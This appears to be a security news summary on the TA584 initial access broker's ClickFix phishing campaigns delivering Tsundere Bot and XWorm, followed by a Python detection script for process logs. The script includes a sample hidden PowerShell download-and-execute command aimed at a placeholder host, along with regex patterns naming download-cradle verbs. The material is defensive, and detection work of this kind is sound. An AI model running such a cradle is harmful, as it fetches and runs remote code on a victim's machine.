SendGrid: Initial access hackers switch to Tsundere Bot for ransomware attacks

TA584 Initial Access Broker Expands Operations with Tsundere Bot and XWorm in Ransomware-Linked Campaigns

A prolific initial access broker (IAB) tracked as TA584 has escalated its activity, deploying the Tsundere Bot malware alongside the XWorm remote access trojan (RAT) to compromise networks likely as a precursor to ransomware attacks. Researchers at Proofpoint, who have monitored the group since 2020, report a threefold increase in TA584’s campaign volume in late 2025, expanding its targeting beyond traditional regions (North America, UK/Ireland) to include Germany, other European countries, and Australia.

Attack Chain & Tactics

TA584’s latest campaigns begin with phishing emails sent from compromised, aged accounts through SendGrid and Amazon SES. Each target receives a unique URL protected by geofencing, IP filtering, and redirect chains (often built on Keitaro TDS) to evade detection. Visitors who pass these filters encounter a CAPTCHA page, followed by a ClickFix prompt instructing them to execute a PowerShell command, a tactic designed to bypass static defenses.

The command fetches an obfuscated script that loads XWorm or Tsundere Bot into memory, while the browser redirects to a benign site to mask the infection. TA584 has historically deployed a range of payloads, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, and DCRAT (still observed in 2025).

Tsundere Bot: A Malware-as-a-Service Threat

Originally documented by Kaspersky in 2024 and linked to a Russian-speaking operator (with ties to 123 Stealer), Tsundere Bot functions as both a backdoor and loader. Key features include:

  • Node.js dependency: The malware installs Node.js on victim systems via its command-and-control (C2) panel.
  • Blockchain-based C2 retrieval: Uses a variant of EtherHiding to fetch C2 addresses from the Ethereum blockchain, with a hardcoded fallback.
  • WebSocket communication: Evades traditional network monitoring.
  • Geofencing: Aborts execution if the system locale matches CIS (Commonwealth of Independent States) languages, suggesting Russian origin.
  • Data exfiltration & lateral movement: Collects system information, executes arbitrary JavaScript, and can turn infected hosts into SOCKS proxies.
  • Bot marketplace: Operators can buy and sell access to compromised machines.
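Two of the behaviours described above, explorer.exe spawning a hidden PowerShell download cradle (the ClickFix step) and node.exe running from a user-writable directory (the Node.js dependency Tsundere Bot installs), are cheap to detect in process-creation telemetry. The following is an added detection example, not code from Proofpoint or from the article; the Sysmon-style key=value event lines are constructed samples, and the regex patterns are assumptions about what such a detection would key on.

```python
import re
from typing import Dict, List

# Constructed sample events (Sysmon-style fields), not real telemetry:
# one ClickFix-style PowerShell launch, one Node.js loader from AppData, two benign.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r'CommandLine=powershell -w hidden -nop -c "iex (iwr http://example.invalid/x)"',
    r"ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"Image=C:\Users\alice\AppData\Roaming\node\node.exe CommandLine=node.exe C:\Users\alice\AppData\Roaming\node\l.js",
    r"ParentImage=C:\Program Files\Microsoft VS Code\Code.exe Image=C:\Program Files\nodejs\node.exe CommandLine=node.exe server.js",
    r"ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe",
]

FIELD_RE = re.compile(r"(ParentImage|Image|CommandLine)=(.*?)(?=\s(?:ParentImage|Image|CommandLine)=|$)")
# Switches and cradle verbs typical of a one-liner pasted into the Win+R box (assumed pattern set)
CRADLE_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-enc|\biex\b|invoke-expression|\biwr\b|downloadstring", re.I)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|ProgramData|Public)\\", re.I)

def parse_event(line: str) -> Dict[str, str]:
    """Split a key=value event line into fields; values may themselves contain spaces."""
    return {k: v for k, v in FIELD_RE.findall(line)}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: Dict[str, str]) -> List[str]:
    """Return detection tags for one event; an empty list means nothing suspicious."""
    tags = []
    parent, image = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    # ClickFix: the Run dialog is hosted by explorer.exe, so explorer launching a
    # hidden PowerShell download cradle matches the "paste this command" lure.
    if parent == "explorer.exe" and image == "powershell.exe" and CRADLE_RE.search(cmd):
        tags.append("clickfix_powershell_cradle")
    # Tsundere Bot needs Node.js; node.exe under a user-writable directory rather
    # than a normal Program Files install is the low-cost signal for that.
    if image == "node.exe" and USER_WRITABLE_RE.search(ev.get("Image", "")):
        tags.append("nodejs_from_user_writable_path")
    return tags

def scan(lines: List[str]) -> List[tuple]:
    """Classify every line and return (line index, tags) for hits only."""
    hits = []
    for i, line in enumerate(lines):
        tags = classify(parse_event(line))
        if tags:
            hits.append((i, tags))
    return hits

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS):
        print(idx, tags)
```

Both rules are deliberately narrow; in production you would pair the node.exe rule with a check for outbound WebSocket connections from that process and for an unexpected Node.js install.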

Broader Implications

Proofpoint assesses with high confidence that Tsundere Bot infections could lead to ransomware deployment, given TA584’s history of facilitating such attacks. The group’s expanded targeting and experimentation with payloads suggest a growing threat, with researchers anticipating further diversification in victims and attack methods.

Source: https://www.bleepingcomputer.com/news/security/initial-access-hackers-switch-to-tsundere-bot-for-ransomware-attacks/

SendGrid cybersecurity rating report: https://www.rankiteo.com/company/sendgrid
